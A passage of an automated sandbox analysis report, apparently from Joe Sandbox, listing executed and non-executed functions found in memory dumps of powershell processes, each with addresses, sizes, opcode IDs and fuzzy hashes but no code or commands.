                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15c7e51d964a2b68a726e3c63e073fb307c5c526a3900ed6ac0cb6933ca91310
                                                                          • Instruction ID: 9cbae5333452c06c2287ebeda900931c07a89cdd8c5ca71041eb1d1e3467930f
                                                                          • Opcode Fuzzy Hash: 15c7e51d964a2b68a726e3c63e073fb307c5c526a3900ed6ac0cb6933ca91310
                                                                          • Instruction Fuzzy Hash: E8117072A0D7C98FDB579B3898765A53FB0AF17205B0905E7D489CB0B3DA1C680CD792
                                                                          Function 00007FFD3478B288 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86da5456a26961afb466c61509dd3e6b2a7bbbd5be122986c59b313bff5aaaff
                                                                          • Instruction ID: 5a885ef8ad6a8fa8a33e0fa19d8d78fb609e953197dc377a3092eeeb8bdc725d
                                                                          • Opcode Fuzzy Hash: 86da5456a26961afb466c61509dd3e6b2a7bbbd5be122986c59b313bff5aaaff
                                                                          • Instruction Fuzzy Hash: 22716E7061CB488FE799DF28C49AAB57BE1EF56311F1001BED19AC71A3CA25A446C781
                                                                          Function 00007FFD3466EAA8 Relevance: .1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2972625263.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd3466d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98246c8f90153602c9fb4b58837917f66936c79d604aa535f53306967bbc5cc3
                                                                          • Instruction ID: ad9aa791d6d02df35ddf7f36eb8f9e2d8ab7b157be920b1fa3b6c97a23758135
                                                                          • Opcode Fuzzy Hash: 98246c8f90153602c9fb4b58837917f66936c79d604aa535f53306967bbc5cc3
                                                                          • Instruction Fuzzy Hash: D541067180DBC44FD7568B38D8959923FF0EF57220B1906DFD088CB1A3D629A84AC792
                                                                          Function 00007FFD347897B0 Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1fc86bee9b3a7f7a3ad406998a7c7a9676feb15329b44b27db76bbf3a7d694e3
                                                                          • Instruction ID: ca688321c6ef65642752a6882354ed5f62f539515d6e756f43e65727347f037a
                                                                          • Opcode Fuzzy Hash: 1fc86bee9b3a7f7a3ad406998a7c7a9676feb15329b44b27db76bbf3a7d694e3
                                                                          • Instruction Fuzzy Hash: 9831F43091CB8C9FDB199B5CA8466E97FF0FB9A311F00426FE449D3252CA74A855CBC2
                                                                          Function 00007FFD3485414D Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2982315324.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34850000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 02ede65cf7430595b91c86b20800eb3c10653c33d4dc70219a8b89eca484f388
                                                                          • Instruction ID: fdf7090b1bcdee0d7b8afe2d5411637d6f13d32841dcb8d886e8b366f2bc20a0
                                                                          • Opcode Fuzzy Hash: 02ede65cf7430595b91c86b20800eb3c10653c33d4dc70219a8b89eca484f388
                                                                          • Instruction Fuzzy Hash: 6621F63274CA184FEB68EB5CA4515E873E1EF59730B1400BBD24AC32A3DE25EC45C780
                                                                          Function 00007FFD34854400 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2982315324.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34850000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 81895c18120086cb4feb6e5316330b0716b4ac3e62d51abe7bdae94a5d7b8b33
                                                                          • Instruction ID: 80f75f3859697115106cb5276d83c60a5b3738ad23df419aeba7e64b2242ce75
                                                                          • Opcode Fuzzy Hash: 81895c18120086cb4feb6e5316330b0716b4ac3e62d51abe7bdae94a5d7b8b33
                                                                          • Instruction Fuzzy Hash: 8621D83274CA484FEB64EB5CA4915F8B7E1EF45734B1400BBD24AC7193DA25EC55C790
                                                                          Function 00007FFD3485681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2982315324.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34850000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e9172a617764c65dd57e217c7938a1f830dcf5ec7be0701a2d4200cec961a80
                                                                          • Instruction ID: 76327164104c122c33a70b7ffa70fb5c5b651a4c4213f0a37f64e9b5569d419e
                                                                          • Opcode Fuzzy Hash: 9e9172a617764c65dd57e217c7938a1f830dcf5ec7be0701a2d4200cec961a80
                                                                          • Instruction Fuzzy Hash: 4D113632B0DA894FEBA5DF9880E01A87BD1EF5A210B0801FEC54CE7193CE28A805D300
                                                                          Function 00007FFD347833B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f52f075e1a068889940d64c93eb92417e897d78ce1085801ced2499207c853b
                                                                          • Instruction ID: e35d54fb46a0325d3c9533a66cc66369ca9705c70068c201e4045385024973ef
                                                                          • Opcode Fuzzy Hash: 1f52f075e1a068889940d64c93eb92417e897d78ce1085801ced2499207c853b
                                                                          • Instruction Fuzzy Hash: D301677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                          Function 00007FFD34789D18 Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 708a7f570e993f2f49d7616ab9d3977417971a8a53d593e2f92abea0358c66a2
                                                                          • Instruction ID: da2aa4395a279e88e74c244025b18711acddd4fe4ad9519ce02fdc7bad6b2e56
                                                                          • Opcode Fuzzy Hash: 708a7f570e993f2f49d7616ab9d3977417971a8a53d593e2f92abea0358c66a2
                                                                          • Instruction Fuzzy Hash: BEF0BB7180868D8FDB46DF2888565D57FA0EF17311F050297D458C70A2DB65A458CBD2

                                                                          Non-executed Functions

                                                                          Function 00007FFD347889F2 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M_^$M_^$M_^$M_^$M_^
                                                                          • API String ID: 0-679677686
                                                                          • Opcode ID: 5eeee41cb9e3b8e375350c3224f09e067f82f37663f1bb40002d118c26910b39
                                                                          • Instruction ID: dbfe60bdf0e9cb2653af52f8a527e5ead6914f6ab96c5dec77e4df8d983f96a7
                                                                          • Opcode Fuzzy Hash: 5eeee41cb9e3b8e375350c3224f09e067f82f37663f1bb40002d118c26910b39
                                                                          • Instruction Fuzzy Hash: 3A4126B3A0D6C29FE6A7572948B70957FD4EF5331570A02F6C294CB0D3ED1D6807A292
                                                                          Function 00007FFD34788BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2977501725.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd34780000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M_^4$M_^5$M_^@$M_^N$M_^U$M_^Y
                                                                          • API String ID: 0-3990506085
                                                                          • Opcode ID: a10203abb5c90ed1e212a8b3e4b305e25375224e9a1c98102282aa182a5a7975
                                                                          • Instruction ID: de872990751068afdee5e663ce08be0da4b40f4ed978d3662049c69488056d23
                                                                          • Opcode Fuzzy Hash: a10203abb5c90ed1e212a8b3e4b305e25375224e9a1c98102282aa182a5a7975
                                                                          • Instruction Fuzzy Hash: 8D31F6A770892A9BC21176BCB8565FD7784DFD533A78507F7D198CB083AC19708B86C0

                                                                          Executed Functions

                                                                          Function 00007FFD3465E8E0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3414845573.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd3465d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kPP/
                                                                          • API String ID: 0-2964709795
                                                                          • Opcode ID: b199a246616f5a3925e6ee3316c3dd5d88b52398803496e59bf938f3309882fd
                                                                          • Instruction ID: 9aacae17bdda01dbd5d73f51c133fd0e49ab1d8df493eafb25ab6e32b2c19d79
                                                                          • Opcode Fuzzy Hash: b199a246616f5a3925e6ee3316c3dd5d88b52398803496e59bf938f3309882fd
                                                                          • Instruction Fuzzy Hash: B141387140DBC04FEB569B399C559623FF0EF57320B1901EFD088CB1A3D629A846C792
                                                                          Function 00007FFD3477644D Relevance: .7, Instructions: 717COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3420129102.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ecccfad85e55c60454ce1263e7af3e6016bc1eae0d14530a103ab8a57e10d7e2
                                                                          • Instruction ID: 0f9ebe43a88e2aa18d0886e96b7235d8defe5734a924ef907fcc8a3a26ce324f
                                                                          • Opcode Fuzzy Hash: ecccfad85e55c60454ce1263e7af3e6016bc1eae0d14530a103ab8a57e10d7e2
                                                                          • Instruction Fuzzy Hash: 42D17070A08A4D8FDF94DF58C895AA97BE1FF59310F54416AD409D72AACA78F881CBC0
                                                                          Function 00007FFD34779780 Relevance: .1, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3420129102.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4720cc554ed896c9962cb3d87e5f19de39b246c829c49194c8605431b5ab9aff
                                                                          • Instruction ID: f35378fdfda0cc16627a14d598f3b1ca227b1feff04a5e8abcf7cf71d467c03c
                                                                          • Opcode Fuzzy Hash: 4720cc554ed896c9962cb3d87e5f19de39b246c829c49194c8605431b5ab9aff
                                                                          • Instruction Fuzzy Hash: 1831E77191CB488FEB189F5C9C466B9BBE0FB9A311F00426FE449D3252CA74B815CBC2
                                                                          Function 00007FFD3477A49C Relevance: .1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3420129102.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2e2bb7f6943f88a54e5bf9addbcd54872e0e7432514e0b2434324a97278c09f0
                                                                          • Instruction ID: 1e9b54c1cfdfd5a9001018cd00c8f37dd0685e72fe3f9a992bebebba83fdde5f
                                                                          • Opcode Fuzzy Hash: 2e2bb7f6943f88a54e5bf9addbcd54872e0e7432514e0b2434324a97278c09f0
                                                                          • Instruction Fuzzy Hash: C821097090C74C8FEB59DB5C984A7E97FE0EB96321F04416BD049C3152D674A81AC792
                                                                          Function 00007FFD3484681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3425113267.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 005eae4f7ddf6be31ef00c7fa37bbee2c065966d71fd893d44e0d2270ee1b61f
                                                                          • Instruction ID: fc39dfd3edd2e8f49f3d1475de9011f04d9cd580a891a0757839040270cf7304
                                                                          • Opcode Fuzzy Hash: 005eae4f7ddf6be31ef00c7fa37bbee2c065966d71fd893d44e0d2270ee1b61f
                                                                          • Instruction Fuzzy Hash: C8110672B0D6894FEB95DF9890E41A877D1EF5A320B0441BFC54DE7293DA2DA845D310
                                                                          Function 00007FFD347733B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3420129102.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 2cc47b0ba0fdde9b7c4ba52e5ec4494637230a7301f5fb9479e41aed1cd45b64
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 6D01677121CB0C8FD754EF0CE451AB5B7E0FB95364F50056DE58AC3691DA36E882CB45
                                                                          Function 00007FFD3484414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3425113267.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1106c3f142613d31307eda6d362875a5cb114dfdba7eb985f4d619f737bf1154
                                                                          • Instruction ID: 3575a639f1e0708fe84d240b79cc3be0fb8e4ae7e1f2ee4f6f616528e36f3072
                                                                          • Opcode Fuzzy Hash: 1106c3f142613d31307eda6d362875a5cb114dfdba7eb985f4d619f737bf1154
                                                                          • Instruction Fuzzy Hash: 24F05E32B0C9558FD7A9EB4CE4914E873E1EF5A36071500BAE25DC7663DA39EC45C780
                                                                          Function 00007FFD34844400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3425113267.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 467f34015529be1d90b75499303328e671bcfe105511f1352741bbb2b473468e
                                                                          • Instruction ID: 18d5bae445825c756c255a2bf4a57f5d7398c1c38fdaeb8b07000b96c5ba4fe7
                                                                          • Opcode Fuzzy Hash: 467f34015529be1d90b75499303328e671bcfe105511f1352741bbb2b473468e
                                                                          • Instruction Fuzzy Hash: 2FF05E32B0D5448FD794EB4CE4914A877E0FF4A72475500B7E25DCB663DA29AC54C790
                                                                          Function 00007FFD348441D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3425113267.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34840000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: f7dbd9fce67771b93a9bbfec132734dfb62449b86e3f2ab7c658e19e21ab47df
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: B1E04F31B0C8188FDA68DB0CE0909E973E1EF9D33171101B7D24EC7661CA26EC51DB80

                                                                          Non-executed Functions

                                                                          Function 00007FFD34778BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000013.00000002.3420129102.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_19_2_7ffd34770000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                          • API String ID: 0-2388461625
                                                                          • Opcode ID: 6e14182ce83c4b81adb18b34466758799a645dbc72dd2360c26ab1be5ef38bd7
                                                                          • Instruction ID: 18c8f0e8386d00b399208522f437423eb827b6ae4f26c3c76d0da1a2ab0982f6
                                                                          • Opcode Fuzzy Hash: 6e14182ce83c4b81adb18b34466758799a645dbc72dd2360c26ab1be5ef38bd7
                                                                          • Instruction Fuzzy Hash: 2021C2B3A089265AC31237FDBCA25ED7B85DB5537834901F3E218DF513D928A49B8682

                                                                          Executed Functions

                                                                          Function 00007FFD347AB258 Relevance: .4, Instructions: 359COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad3607bcd2784be8b3a3c0172a2d176f18c51c95c60278c96aab7fbec6a53155
                                                                          • Instruction ID: 80eeb71f3ceaf476970d50dac91ca865469e07277d2a2e59881b14aa8d707178
                                                                          • Opcode Fuzzy Hash: ad3607bcd2784be8b3a3c0172a2d176f18c51c95c60278c96aab7fbec6a53155
                                                                          • Instruction Fuzzy Hash: 26B12A7061CB488FD799DF18C4996B5BBE1EF96311F10017ED18AC32A3DA25F846CB81
                                                                          Function 00007FFD347A9770 Relevance: .1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0bc69d56774c65f82997ea3b344013902e110edf2cb6c9225707e312cdecd0a7
                                                                          • Instruction ID: 5811e17cba4c21089e98b0906764b74694fb6df71d66e5f7abbbf08b56add5ee
                                                                          • Opcode Fuzzy Hash: 0bc69d56774c65f82997ea3b344013902e110edf2cb6c9225707e312cdecd0a7
                                                                          • Instruction Fuzzy Hash: 5E410A7190DB488FDB589F1C9C466E97BE0FB96310F04426FE449C3292CA64B815CFC2
                                                                          Function 00007FFD3468ED40 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3500101604.00007FFD3468D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd3468d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4244842b46f5cc9068a3a07e466ea47484f266db3aa52092fd6ccf898b2c692e
                                                                          • Instruction ID: 6386eed8faa788d0b974b2a262e909538b2f107aac58d8c0a23cc162838fe415
                                                                          • Opcode Fuzzy Hash: 4244842b46f5cc9068a3a07e466ea47484f266db3aa52092fd6ccf898b2c692e
                                                                          • Instruction Fuzzy Hash: 5441F67140DBC44FE7969B28D855A923FF0EF57320B1905DFD088CB1A3D629A84AC793
                                                                          Function 00007FFD3487681E Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3509508720.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 68a1ec941e5efc312b6152b5562185d70836225d33a4c5ec9764f13e269aaeeb
                                                                          • Instruction ID: ad2a1f9cfb4c5f43c4b4268102b95098314260efb1fe842960919019114071e0
                                                                          • Opcode Fuzzy Hash: 68a1ec941e5efc312b6152b5562185d70836225d33a4c5ec9764f13e269aaeeb
                                                                          • Instruction Fuzzy Hash: EC110632B0D6894FEBA1DF9894F41A87BD1EF5A220B0441BEC54DE7193CA3DA845E350
                                                                          Function 00007FFD347A33B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 0a84c860f013be5360dc54d427524c8b7572197af3ada10ad28df495537e80d8
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 2501677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                          Function 00007FFD347AA0FB Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 747401557e08c6ca90ea0908ec488201a53364c8d2219fe7a8594d170b759eb1
                                                                          • Instruction ID: 0070ff4858d24a765a1d5389293f2f7074f83be7073a06b913b7fe73bd366f69
                                                                          • Opcode Fuzzy Hash: 747401557e08c6ca90ea0908ec488201a53364c8d2219fe7a8594d170b759eb1
                                                                          • Instruction Fuzzy Hash: 1301D6B690DAC89FD785DB28E8AD0D57BF0EF67305B0401ABD548C7161DA295848C7C1
                                                                          Function 00007FFD3487414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3509508720.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction ID: 80d6aa4646295b5ca92b6a66cad14aaa423f26a701a8e64617c627c10a343965
                                                                          • Opcode Fuzzy Hash: a696b47bde92ef0e00d6b383c8105af4f860c883da688ccc937b22cbf0ef8d72
                                                                          • Instruction Fuzzy Hash: EFF09A32B0C9448FD7A8EB4CE8A04A877E1EF5636071140BAE29DC7563CA29EC40C790
                                                                          Function 00007FFD34874400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3509508720.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction ID: 101a74af18f6d41723a9f39376eb31d162845993d8be3272c9726b50ef916865
                                                                          • Opcode Fuzzy Hash: 5596708de90ac53f609d067ff1fd46c7a8521a6c96b6e2cba420e57f94e846bf
                                                                          • Instruction Fuzzy Hash: F0F0BE32A4D5448FD794EB4CE8A04A877E0FF0672474140B6E29DDB563DA29AC40D790
                                                                          Function 00007FFD348741D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3509508720.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd34870000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: bd9a4ed723fb6972c27f1df6bfa7c04d82bb614e94ade7679d558c9943ce9f6d
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 72E04F31B0C8188FDA68EB0CE4A09E977E5EF9937171141B7D28EC7561CA36EC51EB90

                                                                          Non-executed Functions

